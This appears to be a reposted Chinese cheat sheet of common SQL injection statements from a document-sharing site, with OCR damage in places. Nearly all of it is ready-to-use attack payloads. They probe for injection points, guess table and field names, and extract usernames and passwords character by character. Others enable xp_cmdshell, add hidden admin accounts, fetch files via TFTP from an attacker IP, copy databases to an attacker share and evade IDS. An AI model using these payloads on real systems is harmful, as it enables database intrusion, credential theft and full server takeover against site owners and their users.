常用sql注入语句-文档.docx

《常用sql注入语句-文档.docx》由会员分享，可在线阅读，更多相关《常用sql注入语句-文档.docx（8页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、常用显注入语句(转自新浪博客)1 .判断有无注入点;and 1=1 and 1=22 .猜表一般的表的名称无非是admin adminuser user pass password等.and 0 (select count (*) from *)and 0 (select count (*) from admin)判断是否存在 admin 这张表3 .猜帐号数目如果遇到0返回正确页面1返回错误页面说明帐号数目就是1个and 0 (select count (*) from admin)and 10)-and l=(select count (*) from admin where len(用户

2、字段名称 name) 0)and l=(select count (*) from admin where len(密码字段名称 password)0)5 .猜解各个字段的长度猜解长度就是把0变换 直到返回正确页面为止and(select count(*)and(select count(*)from admin where len (*)0)and 1= (select count (*)from admin wherelen (name) 6)错误and l=(select count (*)from admin where len(name) 5)正确 长度是 6and(select c

3、ount (*)from admin wherelen (name) =6)正确通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号当前帐号必须是 SYSADMIN 组获得数据表字段名将字段值更新为字段名，再想法读出这个字段的值就可得到字段 名update表名set字段二（select top 1 col_name（object_id（要查询的数据表名），字段 列如：1） where条件绕过IDS的检测使用变量;declare a sysname set a=xp_+cmdshell exec a dir c:;declare a sysname set a=xp+_cm, + d

4、shell exec a dir c:and l=(select count (*) from admin where len (password) 12)错误长度是 12 and l=(select count (*) from admin where len(password)二正确6.猜解字符and l=(select count (*) from admin where left (name, l)=a)猜解用户帐号的第一位and l=(select count (*) from admin where left (name, 2)=ab)猜解用户帐号的第二位就这样一次加一个字符这样猜

5、,猜到够你刚才猜出来的多少位了就对了，帐号就算出来Tand(select top 1 count (*) from Admin where Asc(mid(pass, 5, 1)=51) 这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就 0K.最后把结果再转换成字符.group by users, id having 1=1-group by users, id, users, username, users, password, users.privs having 1=1一一;insert into users values ( 666, attacker,

6、foobar, Oxffff )一UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. COLUMNS WHERE TABLE_NAME=logintable-UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN(login_id)-UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. COLUMNS

7、WHERETABLE_NAME=logintable WHERE COLUMN_NAME NOT IN(login_id, login_name)-UNION SELECT TOP 1 login_name FROM logintable-UNION SELECT TOP 1 password FROM logintable where login name=Rahul-看服务器打的补丁二出错了打了 SP4补丁 and l=(select VERSION)一看数据隹连接账号的权限，返回正常，证明是服务器角色sysadmin权限。and 1= (SELECT IS_SRVROLEMEMBER(s

8、ysadmin)-判断连接数据库帐号。（采用SA账号连接返回正常二证明了连接账号是SA）and sa=(SELECT System user)一and user name()=dbo-and 0 (select user name ()一看xp cmdshell是否删除and 1= (SELECT count (*) FROM master, dbo. sysobjects WHERE xtype 二 X AND name 二 xpcmdshell)-xp.cmdshell被删除，恢复,支持绝对路径的恢复 ;EXEC master, dbo. sp_addextendedproc xp_cmd

9、shell, xplog70. dll一一;EXEC master. dbo. sp_addextendedprocxp cmdshell, c:inetpubwwwrootxplog70.dll一一反向PING自己实验;use master;declare s int;exec sp oacreate wscript. shell, s out;execsp oamethod s, run, NULL, cmd exe /c ping 192. 168. 0. Tz; 一一加帐号;DECLARE shell INT EXEC SP_OACREATE wscript. shell, shell

10、 OUTPUT EXECSP OAMETHOD shell, run, null, C:WINNTsystem32cmd. exe/c net user jiaoniang$ 1866574 /add-创建一个虚拟目录E盘:;declare o int exec sp oacreate wscript.shell, o out exec sp oamethod o,run, NULL, cscript. exe c: inetpubwwwrootmkwebdir. vbs -w 默认 Web 站点 -v e：访问属性：(配合写入一个webshell)declare o int exec sp

11、oacreate wscript. shell, o out exec sp oamethod o, run,NULL, cscript. exe c:inetpubwwwrootchaccess. vbs -a w3svc/l/R00T/e +browse爆库特殊技巧：=或者把/和、修改%5提交and 0 (select top 1 paths from newtable)一一得到库名（从1到5都是系统的id, 6以上才可以判断） and 1= (select name from master, dbo. sysdatabases where dbid=7)一一and 0 (select c

12、ount (*) from master, dbo. sysdatabases where namel and dbid=6)依次提交dbid = 7, 8, 9.得到更多的数据库名and 0 (select top 1 name from bbs. dbo. sysobjects where xtype=U)暴至表 彳段设为adminand 0(select top 1 name from bbs. dbo. sysobjects where xtype=U and name notin （Admin）来得到其他的表。and uid(str (id)暴到 UID 的数值假设为 1877956

13、9 uid=idand 0 (select top 1 name from bbs. dbo. syscolumns where id=18779569)得至lj 个admin的一个字段,假设为user_idand 0 (select top 1 name from bbs. dbo. syscolumns where id=18779569 and name not in(id,)来暴出其他的字段and 0l)可以得到用户名依次可以得到密码。假设存在user_id username , password等字段and 0 (select count (*) from master, dbo.

14、sysdatabases where namel and dbid=6)and 0 (select top 1 name from bbs. dbo. sysobjects where xtype=U)得至lj表名and 0 (select top 1 name from bbs. dbo. sysobjects where xtype=U and name not in(Address)and 0(select count (*) from bbs. dbo. sysobjects where xtype=U and name=admin and uid(str(id)判断 id 值and

15、0 (select top 1 name from BBS. dbo. syscolumns where id=773577794)所有字 段?id=-l union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from admin?id=一1 union select 1, 2, 3, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from admin (union, access 也好用)得到WEB路径;create table dbo.swap (swappasschar(255);一一;CREATE

16、TABLE newtable (id int IDENTITY(1, 1), paths varchar (500) Declare test varchar(20) exec master. . xp_regreadrootkey=HKEY_LOCAL_MACHINE,key=SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots,value name=/,values二test OUTPUT insert into paths(path) values (test)-;use kul;一;create table cmd (s

17、tr image);一建立 image 类型的表 cmd存在xp cmdshell的测试过程:;exec master. xp cmdshell dir;exec master, dbo. sp addlogin jiaoniang$;一一力口 SQL 帐号;exec master, dbo. sp_password null, jiaoniang$, 1866574;一一;exec master, dbo. sp_addsrvrolemember jiaoniang$ sysadmin;-;exec master. dbo. xp cmdshell net user jiaoniang$ 1

18、866574 /workstations /times:all /passwordchg:yes /passwordreq:yes/active:yes /add;-;exec master. dbo. xp cmdshell net localgroup administrators jiaoniang$ /add;一一exec master. xp servicecontrol start, schedule 启动月艮务exec master. xp_servicecontrol start, server;DECLARE shell INT EXEC SP_OACREATE wscrip

19、t. shell, shell OUTPUT EXECSP_0AMETH0D shell, run, null, C： WINNTsystem32cmd. exe /c net user jiaoniang$ 1866574 /add;DECLARE shell INT EXEC SP_OACREATE wscript. shell, shell OUTPUT EXECSP OAMETHOD shell, run, null, C： WINNTsystem32cmd. exe/c net localgroup administrators jiaoniang$ /add;exec master

20、. xp cmdshell tftp -i youip get file, exe-利用 TFTP 上传文件;declare a sysname set a=xp_+cmdshell exec a dir c:;declare a sysname set a=xp+_cm? + dshell exec a dir c:;declare a; set a=db. name() ;backup database a to disk=你的 IP 你的共享目录 bak. dat如果被限制则可以。select * from openrowset(sqloledb, server;sa;, select

21、OK! exec master, dbo. sp addlogin hax)查询构造：SELECT * FROM news WHERE id三. AND topics. AND adminand(select count (*) from user where username=victim and right (left(userpass, 01), 1)=1) and userpass select 123;-;use master;:a or name like fff%;-显示有一个叫ffff的用户哈。and 1 (select count (email) from user);一一;

22、update users set email=(select top 1 name from sysobjects where xtype=u and status0) where name=ffff;一;update users set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;一;update users set email= (select top 1 name from sysobjects where xtype=u and id581577110) where

23、name=ffff;一;update users set email=(select top 1 count (id) from password) where name=ffff;一;update users set email=(select top 1 pwd from password where id=2) where name二ffff;一;update users set email=(select top 1 name from password where id=2) where name=ffff;-上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段

24、中。通过查看ffff的用户资料可得第一个用表叫ad然后根据表名ad得到这个表的ID得到第二个表的名字insert into users values( 666,char (0x63)+char(0x68)+char(0x72)+char(0x69) +char(0x73),char(0x63)+char(0x68)+char(0x72)+char(0x69)+char (0x73), Oxffff)insert into users values( 667,123, 123, Oxffff)-insert into users values ( 123, admin-, password, O

25、xffff)-;and user0;and (select count (*) from mysysob jects) 0 为 access 数据库 枚举出数据表名;update aaa set aaa= (select top 1 name from sysobjects where xtype=u and status0);一这是将第一个表名更新到aaa的字段处。读出第一个表,第二个表可以这样读出来(在条件后加上and name刚才得到的表名)。;update aaa set aaa= (select top 1 name from sysobjects where xtype=u and

26、 status。and nameOvote);一然后 id= 1552 and exists (select * from aaa where aaa5)读出第二个表，一个个的读出，直到没有为止。读字段是这样：;update aaa set aaa= (select top 1 col_name(object_id俵名)，1);-然后 id= 152 and exists (select * from aaa where aaa5)出错,得到字段名;update aaa set aaa= (select top 1 col_name (object_id(表名)，2);-然后 id=152 and exists (select * from aaa where aaa5)出错,得到字段名获得数据表名将字段值更新为表名，再想法读出这个字段的值就可得到表名update 表名 set 字段二(select top 1 name from sysobjects where xtype=u and status0 and name你得到的表名查出一个加一个)where 条件select top 1 name from sysobjects where xtype=u and status0 and name not in(tablel, table2, ,)